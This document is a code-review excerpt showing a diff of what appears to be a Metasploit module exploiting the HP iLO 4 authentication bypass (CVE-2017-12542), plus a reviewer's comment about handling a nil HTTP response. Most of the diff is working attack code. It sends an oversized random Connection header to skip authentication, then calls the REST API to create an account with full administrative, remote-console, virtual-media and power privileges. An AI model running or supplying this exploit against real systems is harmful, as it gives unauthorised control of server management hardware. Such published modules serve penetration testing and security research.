modules/auxiliary/admin/hp/hp_ilo_create_admin_account.rb

```diff
@@ -0,0 +1,109 @@
+        overflow in the Connection HTTP header handling by the web server.
+        Exploiting this vulnerability gives full access to the Rest API, allowing arbitrary
+        accounts creation.
+      },
+      'References'     =>
+        [
+          [ 'CVE', '2017-12542' ],
+          [ 'BID', '100467' ],
+          [ 'URL', 'https://support.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbhf03769en_us' ],
+          [ 'URL', 'https://www.synacktiv.com/posts/exploit/hp-ilo-talk-at-recon-brx-2018.html' ]
+        ],
+      'Author'         =>
+        [
+          'Fabien Perigaud <fabien[dot]perigaud[at]synacktiv[dot]com>'
+        ],
+      'License'        => MSF_LICENSE,
+      'DisclosureDate' => "Aug 24 2017",
+      'DefaultOptions' => { 'SSL' => true }
+    ))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('USERNAME', [true, 'Username for the new account', 'msf_user']),
+        OptString.new('PASSWORD', [true, 'Password for the new account', 'msf_p4ssw0rd'])
+      ])
+  end
+
+  def check
+    begin
+      res = send_request_cgi({
+                             'method' => 'GET',
+                             'uri'    => '/rest/v1/AccountService/Accounts',
+                             'headers' => {
+                               "Connection" => Rex::Text.rand_text_alphanumeric(29)
+                             }
+                             })
+    rescue
+      return Exploit::CheckCode::Safe
+    end
+
+    if res.code == 200
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def run
+    print_status("Trying to create account #{datastore["USERNAME"]}...")
+
+    data = {}
+    data["UserName"] = datastore["USERNAME"]
+    data["Password"] = datastore["PASSWORD"]
+    data["Oem"] = {}
+    data["Oem"]["Hp"] = {}
+    data["Oem"]["Hp"]["LoginName"] = datastore["USERNAME"]
+    data["Oem"]["Hp"]["Privileges"] = {}
+    data["Oem"]["Hp"]["Privileges"]["LoginPriv"] = true
+    data["Oem"]["Hp"]["Privileges"]["RemoteConsolePriv"] = true
+    data["Oem"]["Hp"]["Privileges"]["UserConfigPriv"] = true
+    data["Oem"]["Hp"]["Privileges"]["VirtualMediaPriv"] = true
+    data["Oem"]["Hp"]["Privileges"]["VirtualPowerAndResetPriv"] = true
+    data["Oem"]["Hp"]["Privileges"]["iLOConfigPriv"] = true
+
+    res = send_request_cgi({
+                             'method' => 'POST',
+                             'uri'    => '/rest/v1/AccountService/Accounts',
+                             'ctype'  => 'application/json',
+                             'headers' => {
+                               "Connection" => Rex::Text.rand_text_alphanumeric(29)
+                             },
+                             'data' => data.to_json()
+                           })
+
+    unless res
+      print_error("Unknown error while creating the user #{res.code}.")
+      return
+    end
```

Comment:
Accessing `res.code` when `res` is `nil` is doomed to failure.

Also, a `nil` `res` is likely due to a failed connection (timeout, no route, host down, etc).

```ruby
    unless res
      fail_with(Failure::Unknown, 'Connection failed')
    end
```